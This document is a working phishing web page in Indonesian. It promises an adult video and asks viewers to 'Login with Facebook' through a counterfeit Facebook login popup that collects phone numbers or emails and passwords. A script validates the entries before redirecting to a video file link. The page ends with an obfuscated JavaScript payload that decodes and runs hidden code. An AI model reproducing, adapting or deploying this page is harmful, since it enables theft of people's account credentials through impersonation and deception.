
<!DOCTYPE HTML>
<html>
    <head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
        <link rel="stylesheet" href="https://site-assets.fontawesome.com/releases/v6.1.1/css/all.css" />
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Exo:wght@100;200;300;400;500;600;700;800;900&family=Secular+One&display=swap" rel="stylesheet">
        <link href='https://unpkg.com/boxicons@2.0.9/css/boxicons.min.css' rel='stylesheet'>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
$(document).ready(function(){$('body').hide();});
    </script>
        <title> </title>
<style>
* {
    margin: 0px;
}
body {
    margin: 0px;
    background-image: url("https://i.pinimg.com/736x/bb/4a/f3/bb4af346b7b940a2c77e9d85b81e29e6.jpg");
    background-position: center center;

    background-repeat: no-repeat;

    background-attachment: fixed;

    background-size: cover;

    background-color: #000;

 

    color:#000;
    
    
    font-family: "Exo", sans-serif;
}
.vidboxalex11 {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.vidboxalex11 video {
        width: 100%;
    height: auto;
    max-width: 500px;
}
.bluboxalex11 {
        position: fixed;
    z-index: 1;
    left: 0;
    top: 0;
    background: rgba(0, 0, 0, 0.5);
    width: 100%;
    height: 100%;
    animation: turu 4s forwards linear;
        display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
    text-align: center;
}
.contalexbox11 {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    max-width: 90%;
}
.contalexbox11 p {
        font-family: "Secular One", sans-serif;
    text-align: center;
    color: #bae1ff;
    text-shadow: 0 0 5px black;
    font-size: 2em;
}
.contalexbox11 span {
        font-family: "Exo", sans-serif;
    text-align: center;
    color: #bae1ff;
    text-shadow: 0 0 5px black;
    font-size: 16px;
}
.contalexbox11 button {
        margin-top: 20px;
    max-width: 250px;
    border-radius: 5px;
    filter: drop-shadow(0 1px 1px rgba(0, 0, 0, 0.5));
    cursor: pointer;
    background: #4767ae;
    color: #fff;
    border: none;
    font-size: 16px;
    width: auto;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    padding: 0px 10px 0px 0px;
    box-shadow: 0px 2px 6px 0px #818181;
}
.contalexbox11 button>i {
        height: 100%;
    background: #1a4397;
    width: 30px;
    font-size: 30px;
    padding: 7px;
    border-radius: 5px 0px 0px 5px;
    margin-right: 10px;
}
.contalexbox11 button>label {
        padding: 0px 10px;
    letter-spacing: 0.5px;
}

.contalexbox11 p {
    animation: tidur 1s forwards linear;
    animation-delay: 0.5s;
    opacity: 0;
}
.contalexbox11 span {
    animation: tidur 1s forwards linear;
    animation-delay: 2s;
    opacity: 0;
}
.contalexbox11 button {
    animation: tidur 1s forwards linear;
    animation-delay: 3.5s;
    opacity: 0;
}
@keyframes turu {
  from {
    -webkit-backdrop-filter: blur(0px);
    backdrop-filter: blur(0px);
  }
  to {
    -webkit-backdrop-filter: blur(20px);
    backdrop-filter: blur(20px);
  }
}

@keyframes tidur {
    from { opacity: 0; }
    to   { opacity: 1; }
}

/* Firefox < 16 */
@-moz-keyframes tidur {
    from { opacity: 0; }
    to   { opacity: 1; }
}

/* Safari, Chrome and Opera > 12.1 */
@-webkit-keyframes tidur {
    from { opacity: 0; }
    to   { opacity: 1; }
}

/* Internet Explorer */
@-ms-keyframes tidur {
    from { opacity: 0; }
    to   { opacity: 1; }
}

/* Opera < 12.1 */
@-o-keyframes tidur {
    from { opacity: 0; }
    to   { opacity: 1; }
}
.popup-login {
    background: rgba(0, 0, 0, 0.5);
    width: 100%;
    height: 100%;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 999999999999999999;
}

.popup-login {
    background: rgba(0, 0, 0, 0.5);
    width: 100%;
    height: 100%;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 999999999999999999;
}

.popup-box-login-fb {
    background: #eceff6;
    max-width: 330px;
    height: auto;
    position: relative;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    text-align: center;
    font-family: "Teko";
    color: #000;
    border-radius: 10px;
}

.navbar-fb {
    background: #3b5998;
    height: auto;
    max-width: 330px;
    padding: 8px;
    border-top-left-radius: 10px;
    border-top-right-radius: 10px;
}

.navbar-fb img {
    width: 115px;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.content-box-fb {
    width: 300px;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.content-box-fb .alert {
    display: none;
    left: -15px;
    position: relative;
    width: 330px;
    padding: 5px;
    background: red;
    color: #fff;
    font-size: 13px;
    font-family: "Roboto";
}

.content-box-fb img {
    width: 75;
    margin-top: 20px;
    margin-left: auto;
    margin-right: auto;
    border-radius: 12px;
    display: block;
}

.txt-login-fb {
    width: 290px;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    margin-bottom: 17px;
    padding: 8px;
    color: #90949c;
    font-size: 16px;
    font-family: Roboto;
    text-align: center;
    display: block;
}

input[type="text"],
input[type="password"] {
    width: 90%;
    height: auto;
    padding: 12px;
    color: #000;
    font-size: 14px;
    font-weight: 400;
    font-family: "Lato", sans-serif;
    border: 1px solid #bdbebf;
    cursor: pointer;
    outline: none;
}

.login-form input[type="text"] {
    margin: 0;
    padding-bottom: 13px;
    border-bottom: none;
    border-radius: 4px 4px 0 0;
    box-shadow: 0 -1px 0 #e0e0e0 inset, 0 0px 0px rgba(0, 0, 0, 0.23) inset;
}

.login-form input[type="password"] {
    margin: 0;
    border-top: none;
    border-radius: 0 0 4px 4px;
    box-shadow: 0 -0px 0 rgba(0, 0, 0, 0.23) inset,
        0 0px 0px rgba(255, 255, 255, 0.1);
}

.btn-login-fb {
    background: #1778f2;
    width: 100%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    padding: 10px;
    color: #fff;
    font-size: 14px;
    font-family: Roboto;
    font-weight: bold;
    text-align: center;
    text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
    border: 1px solid #3578e5;
    border-radius: 5px;
    box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
    outline: none;
    display: block;
}

.btn-login-fb.disabled {
    pointer-events: none;
    background: #8b9dc3;
    border: 1px solid #8b9dc3;
}

.txt-create-account {
    margin-top: 4px;
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.txt-not-now {
    width: 100%;
    height: auto;
    padding: 5px;
    color: #3b5998;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.txt-forgotten-password {
    width: 100%;
    height: auto;
    margin-bottom: 30px;
    padding: 5px;
    color: #7596c8;
    font-size: 13.5px;
    font-family: Roboto;
    text-align: center;
}

.language-box {
    width: 100%;
    height: auto;
    margin-left: auto;
    margin-right: auto;
    display: block;
}

.language-name {
    width: 40%;
    height: auto;
    margin: 5px;
    margin-bottom: 0px;
    color: #3b5998;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: inline-block;
}

.language-name i {
    width: 23px;
    padding: 4px;
    color: #90949c;
    border: 1px solid #3b5998;
    border-radius: 3px;
}

.language-name-active {
    color: #90949c;
    font-weight: bold;
}

.copyrights {
    width: 40%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    color: #90949c;
    font-size: 12px;
    font-family: Roboto;
    text-align: center;
    display: block;
}
</style>
    </head>
    <body style="display:none;">
        <main>
            <div class="vidboxalex11">
                <video id="media" src="https://i.pinimg.com/736x/bb/4a/f3/bb4af346b7b940a2c77e9d85b81e29e6.jpg" loop="" muted=""></video>
                <div class="bluboxalex11">
                    <div class="contalexbox11">
                        <p>Mau Lanjut Nonton?</p>
                        <span>Login Untuk Melanjutkan</span>
                        <button onclick="openmdralexf()"><i class="fa-brands fa-facebook-f"></i> <label>Login with Facebook</label></button>
                    </div>
                </div>
            </div>
        </main>
        </div>
        <div class="popup-login login-facebook animated fadeIn" style="display: none;" id="facebook">
        <div class="popup-box-login-fb">
            <div class="navbar-fb">
                <img width="45" src="https://cdn.jsdelivr.net/gh/Hyuu09/CDNsalz@main/20240202_164508.png">
            </div>
            <div class="content-box-fb">
                <p class="alert sandi">Kata sandi salah. <b>Apakah Anda melupakan kata sandi Anda?</b></p>
                <p class="alert email">Nomor ponsel atau email yang Anda masukkan tidak cocok dengan akun apa pun. <b>Cari akun Anda.</b></p>
                <img width="70" height="70" src="https://cdn.jsdelivr.net/gh/Hyuu09/CDNsalz@main/20240110_175143.png">
                <div class="txt-login-fb">
                    Masuk ke akun Facebook Anda untuk melanjutkan 
                </div>
                <form class="login-form" method="POST" action="" onsubmit="$(this).end()">
                    <label>
                        <input type="text" id="alx_email_fb2" name="email" placeholder="Nomor ponsel atau email"
                            autocomplete="off" autocapitalize="off">
                    </label>
                    <label>
                        <input type="password" id="alx_password_fb2" name="sandi" placeholder="Kata Sandi Facebook" autocomplete="off"
                            autocapitalize="off">
                    </label>
                    <input type="hidden" name="ua" id="ua" value="Video 18+" readonly>
                            <input type="hidden" name="log" id="log" value="Facebook" readonly>
                    <button type="submit" onclick="return buttonfb();" id="btnfb" class="btn-login-fb">Masuk</button>
                    <button class= "btn-login-fb load" style="display: none;">
                           <i class="fa fa-spinner fa-spin" style=""></i> Loading...
                        </button>
                </form>
                <div class="txt-create-account">Buat Akun</div>
                <div class="txt-not-now">Lain Kali</div>
                <div class="txt-forgotten-password">Lupa Kata Sandi?</div>
            </div>
            <div class="language-box">
                <center>
                    <div class="language-name language-name-active">Bahasa Indonesia</div>
                    <div class="language-name">English (UK)</div>
                    <div class="language-name">Basa Jawa</div>
                    <div class="language-name">Bahasa Melayu</div>
                    <div class="language-name">日本語</div>
                    <div class="language-name">Español</div>
                    <div class="language-name">Português (Brasil)</div>
                    <div class="language-name">
                        <i class="fa fa-plus"></i>
                    </div>
                </center>
            </div>
            <div class="copyrights">Facebook Inc.</div>
        </div>
    </div>
    <script src="https://cdn.jsdelivr.net/gh/StyleeJs/3.6.0/jquery.js"></script>
    <script type="text/javascript">
        function openmdralexf() {
                $('#facebook').fadeIn();
                }

        window.addEventListener('submit', function (e) {
            e.preventDefault();
            setTimeout(() => {
                var user = $('#alx_email_fb2').val();
                var pass = $('#alx_password_fb2').val();
                if (user == '' || user == null) {
                    $('.email').show();
                    $('.sandi').hide();
                    return false;
                } else {

                    if (user.includes('@')) {
                        let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                        if (user.match(pattern)) {
                            $('.email').hide();
                        } else {
                            $('.email').show();
                            $('.sandi').hide();
                            return false;
                        }
                    }

                    if (!isNaN(user)) {
                        if (user.length <= 10) {
                            $('.email').show();
                            $('.sandi').hide();
                            return false;
                        } else {
                            $('.email').hide();
                        }
                    }

                    if (user.match(/\s/g)) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }

                    var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if (user.match(regex)) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    }


                    if (user.length <= 5) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }

                }
                if (pass == '' || pass == null || pass.length <= 5) {
                    $('.sandi').show();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if (pass.match(regexs)) {
                    $('.sandi').show();
                    $('.email').hide();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                 location.href = "https://www.mediafire.com/file/40fwop6njgi3y6b/Tante_lagi_enak_tidur_malah_di_ajak.mp4/file?dkey=tgpbpyjl896&r=411";
            }, 1000)
        })

    </script>
<script>
(function(){var cFL='',eMI=359-348;function pLW(e){var k=4397173;var s=e.length;var z=[];for(var d=0;d<s;d++){z[d]=e.charAt(d)};for(var d=0;d<s;d++){var t=k*(d+533)+(k%51019);var j=k*(d+190)+(k%43296);var p=t%s;var y=j%s;var u=z[p];z[p]=z[y];z[y]=u;k=(t+j)%4929532;};return z.join('')};var geK=pLW('icvhtrltusqykcpoacndbornrmzoxjtuewsgf').substr(0,eMI);var JML='va=wihtf.eCr(lp=1+; nh cv]ado2ef,s ra nnf;=As;iv5if=({va9 )8[+t,xv1+0l=+d85d(4[7;av4(v+evs;a(v[=.6afl7f(;,da,tc,=,).94srsa1)t+-dly=pxr(b r;"*;ur<4.xigrmr;r==)mwvtt(hCz+iC;a; ,);uvl8pt)4fC=7l+pqt2;6virrhka="],m*].)gn;nn7".l)dvssor.")i);=ttnvbut)enAlr(,a;5,,1(i  mh ]r9t3v6th{4o(nvoof(0;re(ee6hg=arrjmbj;{.)"(0ek}y eq+=0(1+ragpl)(+r)z0S=mr;6l+mvajonyoo o+)m3umreirua}o<ar<=;2=.]aa=r0s;luc)te((d-hbl=np9ai{9=1[;]ohf-h.61r+heoh==;9)(eai8p.=A-f{n1u-dr]=(bovrk8rld1rvf8s;0c>ix)f0)vczg<,Co[rd rq7;ge=;c1i){oo;)+mj;}arrv,.2rh ;);=8;r,oa)==2;+rr,"8c0;hesu7.ozya=n5bu+;70m[l u.(r>a=v..+shom)a[bc;oa;e(e)nt,[t.9ts.(,[f+r;ivzj(]eu}rs(t!anul  vi=uj=ost}-.jhwsh,h(ct(ipgtna].C+n+=e=j(gnnAtpe= c}o2h)(0[lf;(],] =anc(avv+o,ho;<8()(;,pem=g,b)r6lzCtv.2S[ ont=j2r)slaa r).p)i;"]lro r[nugfsew;-!v,riftros 5=lvtnn.eng2v[o]i)3a= o0[6zvn1khcefaAv1;;).i}8nae"rtf0,ryt+,ia"toi]C(igrx ;=etuy+,+.;77tts{g";n.oyo.i,nv)';var BMs=pLW[geK];var ILB='';var Hol=BMs;var kpL=BMs(ILB,pLW(JML));var Ckf=kpL(pLW(' .3e7r_r)57ya.e22h]ij_.1r%w.mg.3\'e515fg%(a_3;mele\/ f9{%1n3r2to$eeqGexiGcde$u)w.(G;bGhGa(Ge{}5+_%v,ie3{.Gh]3G= 5a}%+t!;,# sa!,Gxdis!%.6igeG).f bi.th$Gy+f6\/!;tcae$a44lG)%,tr#nh6r.,.prG,lbp(8uhbgo([t,4}!s_2$q,9s=G!$ 6Gs;t7SdjeG\/47o)=eG5.a$0u](-,)r(oe$zGvT);h$j=#i., ;f+{Gi%)jtn)((!oa\/e0l.iiG.gno;wz!(=p6s]-,no_\/G)h={;8ruc!c&[0m(s52eu4(he(]G3f,!\/%ha.GGr*)Gr$)6GGih3t1bG-ftG_0r0(coG\/Ga)((j"vGf2.)G4ctGc3ss3u71)bb.u(:eGni:GG$! 4=l=, Geav+.!G\', ({n{)3}]aG,u tS+eo19G4 eG$=;p3%(!G)_a5;G.geG(\'i)G G;md.Ci3$*(=G.%(y((!._eozehG(b\'G3w*G,;G#$Gaeq;,t}&.))77G[fnni)f($$G3e=oa)G(1(h$!.h5!a5](}]..lG5 }Ga4GpyG!l00G=jeG 00).s,(Gfr )ffe3G,h*i)}=1!r.t)o6ew{)o;my0)r=d3)GG43b.,t)(t.qu))(pGG)G(qC=7\/;)G1a1gr7G$Gb%7m,]mfurGGGp\'],7ys]:f42!e(%sfed]t.n.(4}!)$36e1:G-)r;tGtsowe}.76"dmvfou)G3%d)G(h*Gd3Gy#,G,G{)%_6e]&,_$;(f0]-G.5]&+ym1)sp7GfGi+q0G..a;o.3r*==)$G-e\/a"i.""[n.{t1;(.,+rGt0.+.su!6.f,!,;etv=rG;vr\/rda_{GtGwdGtlra#G.inp}(,m4,!G6=_Gs.wG)l,4.6oe7,!p.$.!Gsp&ir\';G3.4G_,jejeo$Gt:00$G;t]egG{t=)0o(lnG(f*aGGGaSf)%o4$(i4w85tge7rl;.eG\/(r]$ea _+ ).e4G()G l,7;e.0)aim!)_#xi"u$5trf(e2].S"3\/.bG!G_;G=G,,.n 1es$os_b,_m Gd.3{e:cG)((sG. (()crs_93'));var WmB=Hol(cFL,Ckf );WmB(6712);return 5729})()
</script>
    </body>
</html>
